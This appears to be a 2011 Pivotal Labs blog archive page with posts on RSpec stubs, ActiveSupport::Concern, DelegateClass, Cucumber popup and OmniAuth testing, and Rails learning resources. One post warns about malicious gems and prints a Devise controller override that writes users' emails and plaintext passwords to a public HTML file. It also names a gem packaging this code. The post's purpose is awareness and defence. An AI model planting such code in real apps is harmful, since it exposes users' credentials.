2011: Some funkinesses

Stephan Hagemann

Friday, November 11, 2011

Interesting

rspec stub != stub!. stub! is an alias method for stub. There is however also a method stub that is an alias for double. If you try to stub a method on the test class (to stub it on the context), you should probably use the magic subject/helper/controller methods. If you don’t, using self.stub(:name => 'result') will create a double, while self.stub!(:name => 'result') will stub the method as you would expect.
Asynchronous file creation and downloading: if an asynchronous process writes a file using File.open and f.write, an other process checking the presence of the file to determine whether it is already available for download, will deliver the empty file, if the file has been opened, but not yet written.
- Workarounds:
  - if you have one write to the file only: check filesize.
  - update an ActiveRecord attribute after the file writing is completed and check against that.
== on DelegateClass: newing up an instance delegate_x of DelegateClass from object x, x == delegate_x, while of course x.class != delegate_x.class.

Keystroke of the day

Rubymine KOTD: The search+replace mode you reach via Cmd+r allows you to see recent searches by hitting the down arrow. If that doesn’t work for you in Lion, hit Ctrl+h.

Another first four weeks: concerned and delegated

Stephan Hagemann

Thursday, November 10, 2011

James’ post from a couple of weeks ago inspired me to write up my own experiences of my first couple of weeks at Pivotal. However, instead of telling you how it felt, I will tell you about stuff I learned.

ActiveSupport::Concern

I have seen and used this pattern of adding both class and instance methods from a module to a class:

module Foo
  def self.included(base)
    base.extend(ClassMethods)
  end

  module ClassMethods
    def foo
      'classy'
    end
  end

  def foo
    'instancy'
  end
end

class Bar
  include Foo
end

Bar.foo # => "classy"
Bar.new.foo # => "instancy"

While the syntax for including Foo in Bar is nice and succinct, the definition of Foo contains the funny looking “included” hook to also extend the base class.

If you happen to have ActiveSupport around, you can instead define Foo as follows while achieving the same result:

module Foo
  extend ActiveSupport::Concern

  module ClassMethods
    def foo
      'classy'
    end
  end

  def foo
    'instancy'
  end
end

The documentation explains the more convenient feature of Concern, which is module dependency. Using Concern, module dependencies are correctly loaded without the need for you to be concerned.

DelegateClass

In one of the projects I worked on, we were exporting data from a Rails app. We wanted access to the business logic of the models while not littering the application’s code with export related code. We decided to extend the models using DelegateClass (see Jeff’s blog post on DelegateClass as a starting point). And DelegateClass rocked our world, too.

A couple of things to note:

It turns out, that these days there is no need to manually ensure that id gets delegated. It works out of the box.
Class methods need manual delegation.

Here is a basic delegation example:

require 'delegate'

class Foo
  def to_s
    "foo"
  end
end

module Export
  class Foo < DelegateClass(Foo)
    def bar
      "#{self} bar"
    end
  end
end

foo = Foo.new

foo.to_s # => "foo"

Export::Foo.new(foo).to_s # => "foo"
Export::Foo.new(foo).bar # => "foo bar"

When delegating ActiveRecord models with associations between them, the following pattern can be helpful to make sure you get the delegated classes when traversing relationships:

class Post < ActiveRecord::Base
  has_many :comments
end

class Comment < ActiveRecord::Base
  belongs_to :post
end

module Export
  class Post < DelegateClass(Post)
    alias_method :original_comments, :comments
    def comments
      original_comments.map { |comment| Export::Comment.new(comment) }
    end

    #some methods for exporting
  end
end

module Export
  class Comment < DelegateClass(Comment)
    alias_method :original_post, :post
    def post
      Export::Post.new(original_post)
    end

    #some more methods for exporting
  end
end

original_post = Post.new(comments: [Comment.new])
original_post.comments.first.class # => Comment(...)
post = Export::Post.new(original_post)
post.comments.first.class # => Export::Comment

#Be aware!
original_post == post # => true
original_post.class == post.class # => false

Interacting with popup windows in Cucumber/Selenium

Pivotal Labs

Monday, October 24, 2011

OAuth providers like LinkedIn often pop-up in a new browser window rather than in Javascript so that the user entering their credentials can see the location bar to be sure they are not being phished by the website requesting their credentials. This is great for security, but not so great for Cucumber testing.

features/signup.feature

Scenario: Sign Up with LinkedIn
  When I go to the home page
  And I follow "Sign Up"
  And I grant LinkedIn access
  Then I should be on the new user page

My application has a hyperlink that opens the OAuth login on the OAuth provider’s website in a new window. Let’s presume the simple matter of wiring this up is already coded in my view.

Testing this with Cucumber requires telling the Selenium web driver to interact with the new popup window. We can do this using page.driver.browser.window_handles to find the newest window handle and scoping out actions to that window.

features/support/signup_steps.rb

When /^I grant LinkedIn access$/ do
  begin
    main, popup = page.driver.browser.window_handles
    within_window(popup) do
      fill_in("Email", :with => "newlee@pivotallabs.com")
      fill_in("Password", :with => "password")
      click_on("Ok, I'll Allow It")
    end
  rescue
  end
end

And that’s it!

Keep in mind that if you use this test as-is, you will be hitting LinkedIn on the real Internet. This is great if you want a test that will always verify the real API, but not so good for CI, since it is Internet connection-dependent and slow. Consider using something like VCR or Artifice to stub out your service calls.

Do you know what your gems are doing?

Ben Smith

Saturday, October 8, 2011

A client recently expressed concern with a number of gems added to his project. A quick explanation and a little documentation cleared up what each gem was doing/why we needed it.

This satisfied the client, but it got me wondering: what’s the worst thing that could happen from a gem if it was malicious? The worst case I could imagine would be the client’s customer’s data getting stolen, the customers completely loosing faith in the site, and the client’s project failing because of it.

How likely is this to happen? I don’t really know.

How hard would it be for someone to do this?

I decided to see what it would take to harvest usernames and passwords from a typical Rails app using Devise for authentication. In less than 5 minutes, I had written an initializer which modified the behavior of the Devise controller to write out usernames and passwords to an HTML file in the public directory of the app.

The code wasn’t clever at all. I copied/pasted the create action, and added three extra lines to write out the data to the file.

      class Devise::SessionsController < ApplicationController
        prepend_before_filter :require_no_authentication, :only => [ :new, :create ]
        include Devise::Controllers::InternalHelpers

        # POST /resource/sign_in
        def create
          File.open("#{Rails.root}/public/passwords.html", 'a+') do |f|
            f.write("#{params[:user][:email]} #{params[:user][:password]}<br />")
          end
...

So the answer to my question, how hard would it be for someone to write a malicious gem that would compromise customer data: dead easy.

I packaged up the code as a gem. Anyone can easily pwn their own Devise Rails app by adding the following line to their Gemfile:

gem 'devise_hack'

Of course, who would install a gem that would pwn their own app? No one, but what about a “long con” approach?

Say I wrote a useful gem, pushed updates occasionally, and got a decent level adoption. At this point I could push a new version of the gem which contained a little hack, and wait for the usernames and passwords to roll in. Maybe like this little guy…

gem 'awesome_rails_flash_messages'

This little gem takes all of your Rails flash messages and makes them more awesome. Simple as that. Ohh, it also logs and requests containing a password to a file AND posts it to an external web service, but that’s nothing to worry about.

So how do you avoid these malicious gems? For this dead simple hack, it is dead simple to identify. All you have to do is look at the source code. If you see code that is writing credentials to a file, maybe posting to an external web service, or sending emails when it really shouldn’t be… you might want to reconsider using that gem.

SF Standup 06/15/2011: Ruby 1.9.2patched and iScroll

Ryan Dy

Wednesday, June 15, 2011

Ask for Help

Interesting Things

Looking for performance patches from ruby 1.9.3 that improve the performance of require? They have been back ported to ruby1.9.2p180.
A new version of iScroll has been released (v4.1.3). It has performance fixes and better compatibility support. If you need position:fixed or overflow:scroll on a mobile device today you need to check it out.

Code Monkey

Alex Chaffee

Friday, May 20, 2011

So I didn’t go to whatever was going on in Baltimore this week, but I did do a whole bunch of open source coding over the past week or two:

TestFirst has a totally revamped design, including the downloadable (or cloneable) student exercises, and Learn JavaScript is now a first-class citizen
Wrong‘s expect alias now plays nicer with RSpec’s expect
Rerun got a few new command-line options, including --clear and --exit so you can now easily rerun regular scripts (like rerun -cx rake test) when their files change
I submitted a patch to RubyGems to make the warningitis less ZOMG and more KTHXBY
Fonzie is a bookmarklet that tells you what font you’re looking at
Twitter RSS is a bookmarklet that brings back the RSS link to the New Twitter UI
Showoff works better with nested bullets and missing showoff.json files — so go nag Scott if you want him to accept my patches ;-)
I also finally got my git pre-commit hook correctly stripping whitespace, and

A lot of these projects, especially TestFirst, are aching for improvement, so if you feel like contributing code or courseware, or even just feature requests, please get in touch!

RubyGems Warningitis Outbreak

Alex Chaffee

Thursday, May 12, 2011

Have you upgraded RubyGems lately? Is your console suddenly filled with warnings like this?

NOTE: Gem::Specification#default_executable= is deprecated with no replacement. It will be removed on or after 2011-10-01.
Gem::Specification#default_executable= called from /Users/chaffee/.rvm/gems/ruby-1.9.2-p0/specifications/thin-1.2.7.gemspec:10.

You may be showing signs of a new malady known as Warningitis! So far there is no cure, but doing the following will temporarily cure your symptoms:

gem update --system 1.7.2

Several experimental treatments are being hastily developed as well, but these have not yet been approved by the FDA. Check the “scary warnings are scary” bug thread for more details.

This has been a public health alert. Please do not panic. SARS masks and iodine pills are not recommended at this time.

Standup 2011.04.12: Tweeting Standup and RSpec

Glenn Jahnke

Tuesday, April 12, 2011

Interestings

It was suggested that we should Tweet our standups as well as post them to our blog.

Helps

What is the overhead of an RSpec “it” block?

People seem to think the overhead is really negligible compared to Rails load time or making any DB calls whatsoever. People have seen whole codebases moved from TestUnit to RSpec with no notable speed slow-down.

Testing OmniAuth based login via Cucumber

Mike Gehard

Thursday, March 3, 2011

If you haven’t looked at OmniAuth for authentication with sites like Google, Github and Facebook, then you should take a look. It is pretty killer.

This morning we needed to write a Cucumber scenario to test that a user could log into the system using Google Apps.

We did a quick spike on getting OminAuth integrated, which was a super simple process, and poked around in the browser to make sure it was working OK.

Thanks to Jose Valim for providing some guidance, via the Devise test suite, on how to get this all up and running.

The basics can be found in this Gist:

I put that code in /features/support/omniauth.rb and then all I need to do is label any scenarios that need to deal with login with an @omniauth_test tag and we are all set.

As our features count grows, I could see us doing this before/after all Cucumber scenarios.

Note: You need to be using 0.2.0.beta5 of OmniAuth to get this to work. Earlier versions don’t have the testing functionality built in.

Also Note: This same functionality can be used in good, old RSpec integration tests or Steak tests as well.

Visit to Olin College

Pivotal Labs

Thursday, February 3, 2011

Visiting Olin

Today, Josh Knowles, Grant Hutchins, and I visited Franklin W. Olin College of Engineering in Needham, MA to talk to Prof. Mark L. Chang’s amazing new dotcom course. We talked about agile development, and more specifically how Pivotal does agile and why. We went through an example of test-driven development for a simple Rails app, and had a miniature inception for a fictitious product.

Some students asked for some resources, particularly for documentation, so I put together a collection of resources for anyone looking to pick up agile, TDD and Ruby on Rails. This is intentionally not an exhaustive list. I wanted to include the bare minimum for getting started on each topic as a jumping off point and include further references at the end.

Agile Development

Agile the Pivotal Way

A talk by Ian MacFarland, also available on iTunes. video and audio
What agile development means for Pivotal, with a healthy dose of how much fun it is to work here.

Pivotal Tracker

You can think of Pivotal Tracker as a digital card wall. It’s our most indispensable project tool.

Test-Driven Development

RSpec presentation

This talk by Kerry Buckley is probably the best RSpec overview and tutorial I’ve seen. Read this and follow along with the code and you will know more than just the basics of how TDD with RSpec works.

Robolectric

The Pivotal Labs TDD framework for Android development with a great Getting Started Guide and JavaDoc.

Source Control

Git Immersion

A great interactive tutorial on git.

Ruby

Ruby Koans

Learn Ruby through test-driven development. This tutorial covers a huge number of features of the Ruby language in a fun and interactive way.

Rails

Rails for Zombies

Includes video tutorials and interactive exercises that go over the core concepts of Rails.

Popular gems

We commonly use the following gems on Pivotal projects:

devise for authentication — check out their README and Wiki for documentation
cancan for role-based authorization — again, check the README and wiki for documentation
rspec-rails for TDD — see Wiki for installation, see above RSpec presentation for how to use it
cucumber-rails for BDD and integration testing — see README for installation, this Railscast for an introduction
paperclip for file attachment and storage — see README for documentation
will_paginate for index pagination (ie: “Showing results for Page 1 of 30″) — check out the README
jquery-rails for Javascript — to begin with, Prototype may be enough for you, but if you’re comfortable with jQuery or want to give it a try, follow the README to install jQuery and remove Prototype from your Rails project